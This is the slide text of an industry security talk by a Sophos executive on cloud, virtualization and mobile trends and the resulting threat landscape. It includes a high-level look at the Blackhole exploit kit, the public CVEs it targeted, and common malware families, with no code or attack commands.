Big Trends in IT and how they shape Security Gerhard Eschelbeck, CTO
Industry Trends #1 The Rapidly Growing Demand for Processing and Data Storage Google processes 20 PB a day London s traffic cams processing 8TB / day CERN s LHC generates 15 PB a year Personal Photos 10,000 PB (CAGR 100%) NOAA has ~1 PB climate data Global data surpassed Zettabyte barrier (10 21 or 1 billion Terabytes) Data Intensive applications Data Mining and Indexing Machine Learning Financial Analysis 640K ought to be enough for anybody.
Industry Trends Expand your Infrastructure! Buy new servers, increase your software costs, provision more datacenter capacity!!
Industry Trends Look to the cloud! Pay for the bandwidth and server resources that you need. When your job is done then turn the whole thing off!
Industry Trends #2 It s all about the cloud
Industry Trends #3 Virtualization The ability to run multiple operating systems on a single physical system and share the underlying hardware resources App App Guest OS (Linux) App Guest OS (NetBSD) Virtual Machine Monitor (VMM) / Hypervisor Hardware App Guest OS (Windows) VM VM VM App Xen VMWare UML Denali etc.
Industry Trends #4 Mobile and the changing endpoint platforms By 2013, the number of mobile workers will grow to nearly 1.2 billion people, representing more than a third of the world s workforce. IDC, 2010 Gartner predicts that by 2014 90% of organizations will support corporate applications on consumer devices
The Mobility of Data
What does this all mean to users? Information anywhere Accessible from any device Easy to share Security is at the core of all these changes
Security was easy in the early days
Today: Security is complex Dropbox Researchers discovered at least three different ways to hack into Dropbox and access data without authorization Epsilon Leaked millions of names and email addresses from the customer databases of some of its clients, including trusted brands like Best Buy, Marks & Spencer, Marriott Rewards and Chase Bank Sony Corp. s PlayStation Network/Online Entertainment Suffered a series of breaches that placed 100 million customer accounts at risk It s been speculated that this is the most expensive data breach ever, costing the company up to $2 billion Stratfor A subscription-based provider of geopolitical analysis, saw its servers breached. The stolen data included 75,000 credit card numbers and 860,000 user names and passwords, which the hackers then exposed online
The Security Landscape Reduce attack surface Protect everywhere Stop attacks and breaches Keep people working URL Filtering Web Application Firewall Endpoint Web Protection Encryption for cloud Data Control Access control Automation WiFi security Anti-spam Patch Manager Mobile Control Virtualization Anti-malware User education Visibility Local self-help Device Control Application Control Secure branch offices Mobile app security Intrusion prevention Firewall Clean up Technical support Encryption Tamper protection Free Home use VPN Email encryption Live Protection Performance Small updates
The Changing Threat Landscape Financially motivated, computer generated malware Number of variants is growing sharply From Destructive to Stealth Vulnerabilities in well known and broadly used software are common attack vectors Targeted and organized attacks are becoming widely prevalent Social Networking sites are increasingly used as a distribution mechanism Short lifetime (hours to days) with fast mutation More bad files than good files
Web is the primary vector of attack 19 000 new malicious pages every day 80% belong to legitimate sites
Exploit kits/packs Web-based kits to make it trivial for anyone to exploit users over the web Exploit packs can be bought relatively cheaply No skill required Kit automatically create content to target relevant browser and application vulnerabilities Silent infection of victims
Inside Blackhole Unique rental option within business model. Tight control.
Inside Blackhole Targets variety of exploits. Java & Flash most successful. CVE Target Description CVE-2011-3544 Java Oracle Java SE Rhino Script Engine Remote Code Execution Vulnerability CVE-2011-2110 Flash Adobe Flash Player unspecified code execution (APSB11-18) CVE-2011-0611 Flash Adobe Flash Player unspecified code execution (APSA11-02) CVE-2010-3552 Java Skyline CVE-2010-1885 Windows Microsoft Windows Help and Support Center (HCP) CVE-2010-1423 Java Java Deployment Toolkit insufficient argument validation CVE-2010-0886 Java Unspecified vulnerability CVE-2010-0842 Java JRE MixerSequencer invalid array index CVE-2010-0840 Java Java trusted Methods Chaining CVE-2010-0188 PDF LibTIFF integer overflow CVE-2009-1671 Java Deployment Toolkit ActiveX control CVE-2009-4324 PDF Use after free vulnerability in doc.media.newplayer CVE-2009-0927 PDF Stack overflow via crafted argument to Collab.getIcon CVE-2008-2992 PDF Stack overflow via crafted argument to util.printf CVE-2007-5659 PDF collab.collectemailinfo CVE-2006-0003 IE MDAC
Inside Blackhole Countries hosting Blackhole exploit kit
Inside Blackhole Administration interface
Inside Blackhole Administration interface optimized for mobile
Blackhole payloads Zbot FakeAV ZeroAccess rootkit TDSS rootkit Ransomware Even OSX payloads?
Police Ransomware
FakeAV: A very clever threat Scare the user into believing machine is infected
FakeAV for Mac No longer are just Windows users the target!
There is even FakeAV for Android!
Android malware Over 30k variants of malware known Information stealers (Andr/SMSRep) SMS senders (Andr/AdSMS) Phishing (fake mobile banking software) Privilege escalation exploits (DroidDream) Zeus for Android (Zitmo)
New Platforms require a new security approach Challenges: Loss/Theft Policy, Reporting Cross Platform Vulnerable, malicious apps DLP Secure browsing Application Security Data Protection Device Management
Simplifying the entire Security Lifecycle Reduce attack surface Protect everywhere Stop attacks and breaches Keep people working URL Filtering Web Application Firewall Endpoint Web Protection Encryption for cloud Data Control Access control Automation WiFi security Anti-spam Patch Manager Mobile Control Virtualization Anti-malware User education Visibility Local self-help Device Control Application Control Secure branch offices Mobile app security Intrusion prevention Firewall Clean up Technical support Encryption Tamper protection Free Home use VPN Email encryption Live Protection Performance Small updates
Covering the entire Security Lifecycle 1) New computing platforms (Mobile, Cloud, Virtual) 2) The expanded threat (including data loss) 3) More regulations around compliance, data loss and privacy 4) Few IT resources to manage the increasingly complex security landscape
Complete Security Vision Branch office Data in the cloud RED 10 Endpoints Active Protection Mobile / BYOD user Road warrior VPN Central office Visitor UTM OR Web Network Email Management Secure Wi Fi Endpoints Servers
Thank You Q&A Gerhard Eschelbeck ge@sophos.com